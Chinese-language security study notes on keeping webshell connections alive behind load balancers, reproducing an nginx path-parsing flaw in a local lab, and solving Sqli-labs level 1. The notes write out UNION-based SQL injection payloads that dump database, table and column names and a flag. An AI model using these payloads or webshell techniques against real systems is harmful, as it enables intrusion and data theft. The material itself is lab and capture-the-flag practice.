负载均衡下webshell连接
在负载均衡下,webshell连接的方式会有所不同。以下是两种常见的负载均衡下webshell连接的方式:
1.使用Session Sticky方式: 在Session Sticky方式下,负载均衡器会将同一个客户端的请求始终转发到同一台后端服务器上。这样,当一个webshell连接建立后,后续的请求都会被转发到同一台服务器上,保证了连接的连续性和稳定性。
2.使用共享存储方式: 在共享存储方式下,负载均衡器会将webshell文件存储在共享存储设备上,而不是存储在后端服务器上。这样,无论请求被转发到哪台服务器,都可以访问到相同的webshell文件,实现了连接的共享和一致性。
需要注意的是,负载均衡下的webshell连接可能会面临一些挑战,比如文件分片上传导致文件被拆分到不同的后端服务器上。解决这个问题的方法取决于负载均衡算法的选择和具体的实现方式。
nginx解析漏洞
nginx解析漏洞是指由于nginx的配置问题,导致nginx将以'.php'结尾的文件交给fastcgi处理,从而可能导致恶意用户上传包含PHP代码的文件并执行。下面是复现nginx解析漏洞的步骤:
1.下载并安装nginx解析漏洞复现环境:
引用中提供了一个nginx空字节漏洞复现环境的压缩包,你可以下载并解压该压缩包。
解压后,你将得到一个包含nginx和php的Windows环境。
2.配置nginx.conf文件:
打开解压后的nginx目录,找到nginx.conf文件并打开。
在http块中添加以下配置:
location ~ \.php$ {
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
}
3.启动nginx和php:
打开命令行窗口,进入nginx目录。
执行以下命令启动nginx:
start nginx
打开另一个命令行窗口,进入php目录。
执行以下命令启动php:
php-cgi.exe -b 127.0.0.1:9000
4.构造恶意文件:
在解压后的nginx目录中,找到uploadfiles文件夹。
在该文件夹中创建一个名为level2.png的文件,并将其中插入恶意的PHP代码。
5.复现漏洞:
在浏览器中访问以下URL: 其中,your-ip是你的IP地址。
http://your-ip/uploadfiles/level2.png/1.php
如果nginx解析漏洞存在,你将看到执行了恶意代码的结果。
sql注入第一关
Sqli-labs 01关
输入?id=1 正常
输入?id=1' 报错 ' .0 '
输入?id=1'--+ 正常
判断是字符型注入,闭合方式是
limit 100,1
是从第100条数据开始,读取1条数据。limit 6
是读取前6条数据。
?id=1' order by 3--+ 正常
判断回显位有三个。
?id=1' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata--+
联合注入
爆出库是 ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test
?id=1' and 1=2 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='ctfshow'--+
爆出表是 flag
?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag'--+
爆出列是id,flag
?id=1' and 1=2 union select 1,2,group_concat(flag) from ctfshow.flag--+